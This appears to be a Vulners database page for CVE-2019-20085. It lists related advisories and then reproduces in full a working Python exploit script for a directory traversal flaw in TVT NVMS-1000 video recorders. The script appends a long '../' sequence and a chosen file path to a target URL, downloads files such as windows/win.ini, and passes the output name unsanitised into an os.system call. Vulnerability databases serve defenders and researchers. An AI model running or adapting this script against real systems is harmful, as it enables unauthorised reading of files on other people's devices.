| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| TVT NVMS 1000 - Directory Traversal Exploit | 13 Apr 202000:00 | – | zdt | |
| CVE-2019-20085 | 30 Dec 201900:00 | – | attackerkb | |
| CVE-2019-20085 | 21 Jan 202014:52 | – | circl | |
| TVT NVMS-1000 Directory Traversal Vulnerability | 3 Nov 202100:00 | – | cisa_kev | |
| TVT NVMS-1000 Directory Traversal Vulnerability | 30 Dec 201900:00 | – | cnvd | |
| CVE-2019-20085 | 30 Dec 201902:28 | – | cve | |
| CVE-2019-20085 | 30 Dec 201902:28 | – | cvelist | |
| TVT NVMS-1000 Directory Traversal | 1 Jan 202009:36 | – | metasploit | |
| TVT NVMS 1000 - Local File Inclusion | 1 Jun 202605:38 | – | nuclei | |
| CVE-2019-20085 | 30 Dec 201903:15 | – | nvd |
# Exploit Title: TVT NVMS 1000 - Directory Traversal
# Date: 2020-04-13
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html
# Original Author : Numan Türle
# CVE : CVE-2019-20085
import sys
import requests
import os
import time
if len(sys.argv) !=4:
print " "
print "Usage : python exploit.py url filename outputname"
print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini"
print " "
else:
traversal = "../../../../../../../../../../../../../"
filename = sys.argv[2]
url = sys.argv[1]+traversal+filename
outputname = sys.argv[3]
content = requests.get(url)
if content.status_code == 200:
print " "
print "Directory Traversal Succeeded"
time.sleep(3)
print " "
print "Saving Output"
os.system("touch " + outputname)
output_write = open(outputname,"r+")
output_write.write(content.text)
output_write.close()
else:
print "Host not vulnerable to Directory Traversal!"Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation